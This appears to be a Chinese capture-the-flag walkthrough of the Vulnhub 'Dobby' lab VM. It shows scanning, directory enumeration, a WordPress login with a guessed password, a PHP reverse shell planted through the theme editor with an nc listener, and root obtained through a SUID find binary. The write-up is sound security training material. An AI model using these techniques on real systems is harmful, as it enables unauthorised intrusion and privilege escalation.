Vulnhub 之Dobby靶机详细解题过程
Dobby
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo netdiscover -i eth1
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.186
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.186 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-17 20:22 EST
Nmap scan report for 192.168.56.186
Host is up (0.00055s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:85:C2:A7 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds
从NMAP扫描结果看,目标主机只有一个开放端口80,运行HTTP服务,而且注意到title是一串经过base64编码后的字符串,先把它解码:
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ echo "dG9vIGVhc3kgbm8/IFBvdHRlcg==" | base64 -d
too easy no? Potter
Potter不知道是不是用户名,先搁置一边。
Get Access
浏览器访问80端口,返回Apache默认页面(除了前面提到的title),但是页面源代码有注释:
<!--
See: /alohomora
-->
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.186/alohomora/
Draco's password is his house ;)
不管如何,先扫描一下有无目录:
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ gobuster dir -u http://192.168.56.186 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.186
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/17 21:02:20 Starting gobuster in directory enumeration mode
===============================================================
/log (Status: 200) [Size: 45]
/server-status (Status: 403) [Size: 279]
Progress: 218431 / 220561 (99.03%)===============================================================
2022/11/17 21:02:47 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.186/log
pass:OjppbGlrZXNvY2tz
hint --> /DiagonAlley
这里出现了密码,而且给出另外一个提示,应该是目录,试一下:
浏览器访问该目录:
http://192.168.56.186/DiagonAlley/
从返回的页面明显可以知道这是一个wordpress站点,并且其中有篇博文很显眼,显然是编码过的,查了一下是brainfuck编码,解码出来是乱码,很奇怪。
再看能不能登录wordpress后台,用draco以及密码OjppbGlrZXNvY2登录,竟然认证失败,奇怪!
这个密码是不是也是编码过的,用base64解码后是: ::ilikesocks
但是用解码后的密码同样不能认证通过,可能这个线索不对。
前面提示draco的密码是他的房子house
Google查询draco's house name, 搜索结果指向Slytherin
看是否可以登录,可以成功登录,登录以后先修改语言为英文
接下来设法将shell.php脚本上传到wordpress后台
Appearance->Theme Editor->404 Tempelates, 成功将404页面的php代码更换为shell.php代码。
通过查查看页面源代码
<link rel='stylesheet' id='admin-bar-css' href='http://192.168.56.186/DiagonAlley/wp-includes/css/admin-bar.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://192.168.56.186/DiagonAlley/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-bootstrap-grid-css' href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/css/bootstrap-grid.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-5-css' href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/css/fontawesome-all.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-fonts-css' href='https://fonts.googleapis.com/css?family=Poppins%3A400%2C400i%2C700%2C700i%7CRubik%3A400%2C400i%2C700%2C700i&subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-style-css' href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3' type='text/css' media='all' />
可以猜测404页面的位置为:
'http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.186] 38798
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
03:37:42 up 1:21, 0 users, load average: 0.00, 0.00, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@HogWarts:/$
在Kali Linux成功得到了目标主机反弹回的shell:
www-data@HogWarts:/home/dobby$ cat flag1.txt
cat flag1.txt
Command 'cat' not found, but can be installed with:
apt install coreutils
Please ask your administrator.
www-data@HogWarts:/home/dobby$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
www-data@HogWarts:/home/dobby$ which cat
which cat
www-data@HogWarts:/home/dobby$ ls
ls
Descargas Escritorio Música Público flag1.txt
Documentos Imágenes Plantillas Vídeos sudoers
www-data@HogWarts:/home/dobby$ more flag1.txt
more flag1.txt
"Harry potter this year should not go to the school of wizardry"
flag1{28327a4964cb391d74111a185a5047ad}
www-data@HogWarts:/home/dobby$
得到了user flag, 这里不能使用cat命令,所以改用More来显示
提权
将linpeas.sh脚本上传至目标主机的tmp目录,修改权限,并执行
不过前面咱们得到了另一个密码,不知道这个密码是不是dobby的密码,尝试一下再说
哈哈竟然是对的密码是ilikesocks
www-data@HogWarts:/tmp$
www-data@HogWarts:/tmp$
www-data@HogWarts:/tmp$
www-data@HogWarts:/tmp$ su - dobby
su - dobby
Password: OjppbGlrZXNvY2
su: Authentication failure
www-data@HogWarts:/tmp$ su - dobby
su - dobby
Password: ilikesocks
dobby@HogWarts:~$
查看linpeas.sh运行结果,发现find命令有SUID位,参考GTFOBINS网站给出的方法进行提权
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 109K Oct 8 2020 /snap/snapd/9721/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Mar 5 2020 /snap/core18/1885/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar 5 2020 /snap/core18/1885/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1885/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1885/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1885/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/1932/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1932/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1932/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/1932/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1932/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1932/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1932/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1932/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1932/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1932/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11 2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Aug 3 2020 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root sssd 92K Oct 6 2020 /usr/libexec/sssd/ldap_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 83K Oct 6 2020 /usr/libexec/sssd/p11_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 168K Oct 6 2020 /usr/libexec/sssd/krb5_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 31K Oct 6 2020 /usr/libexec/sssd/proxy_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 56K Oct 6 2020 /usr/libexec/sssd/selinux_child (Unknown SUID binary!)
-rwsr-xr-- 1 root dip 386K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 15K Sep 29 2020 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 71K Aug 30 2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 179K Jul 8 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K May 28 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 47K Jul 24 2020 /usr/bin/base32
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Sep 30 2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug 3 2020 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 52K May 28 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Aug 30 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Aug 30 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 467K Jun 7 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 131K Oct 19 2020 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-- 1 root messagebus 51K Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 15K Oct 7 2020 /usr/lib/xorg/Xorg.wrap
dobby@HogWarts:/var/www/html/DiagonAlley$ ls -alh /usr/bin/find
ls -alh /usr/bin/find
-rwsr-xr-x 1 root root 313K sep 30 2020 /usr/bin/find
dobby@HogWarts:/var/www/html/DiagonAlley$ /usr/bin/find . -exec /bin/sh -p \; -quit
<onAlley$ /usr/bin/find . -exec /bin/sh -p \; -quit
# id
id
uid=1000(dobby) gid=1000(dobby) euid=0(root) grupos=1000(dobby),4(adm),24(cdrom),30(dip),46(plugdev),121(lpadmin),132(lxd),133(sambashare)
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4,0K nov 7 2020 .
drwxr-xr-x 20 root root 4,0K nov 7 2020 ..
-rw------- 1 root root 162 nov 7 2020 .bash_history
-rw-r--r-- 1 root root 3,1K ago 14 2019 .bashrc
drwx------ 2 root root 4,0K oct 22 2020 .cache
drwxr-xr-x 3 root root 4,0K nov 7 2020 .local
-rw-r--r-- 1 root root 161 sep 16 2020 .profile
-rw-r--r-- 1 root root 1,4K nov 7 2020 proof.txt
# cat proof.txt
cat proof.txt
/bin/sh: 4: cat: not found
# more proof.txt
more proof.txt
_ __
___ | ' \
___ \ / ___ ,'\_ | .-. \ /|
\ / | |,'__ \ ,'\_ | \ | | | | ,' |_ /|
_ | | | |\/ \ \ | \ | |\_| _ | |_| | _ '-. .-',' |_ _
// | | | |____| | | |\_|| |__ // | | ,'_`. | | '-. .-',' `. ,'\_
\\_| |_,' .-, _ | | | | |\ \ // .| |\_/ | / \ || | | | / |\ \| \
`-. .-'| |/ / | | | | | | \ \// | | | | | || | | | | |_\ || |\_|
| | | || \_| | | | /_\ \ / | |` | | | || | | | | .---'| |
| | | |\___,_\ /_\ _ // | | | \_/ || | | | | | /\| |
/_\ | | //_____// .||` `._,' | | | | \ `-' /| |
/_\ `------' \ | AND `.\ | | `._,' /_\
\| THE `.\
_ _ _ _ __ _ __ _ /_
(_`/ \|_)/ '|_ |_)|_ |_)(_
._)\_/| \\_,|__| \|__| \ _)
_ ___ _ _
(_` | / \|\ ||__
._) | \_/| \||___
root{63a9f0ea7bb98050796b649e85481845!!}
#
成功拿到了Root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
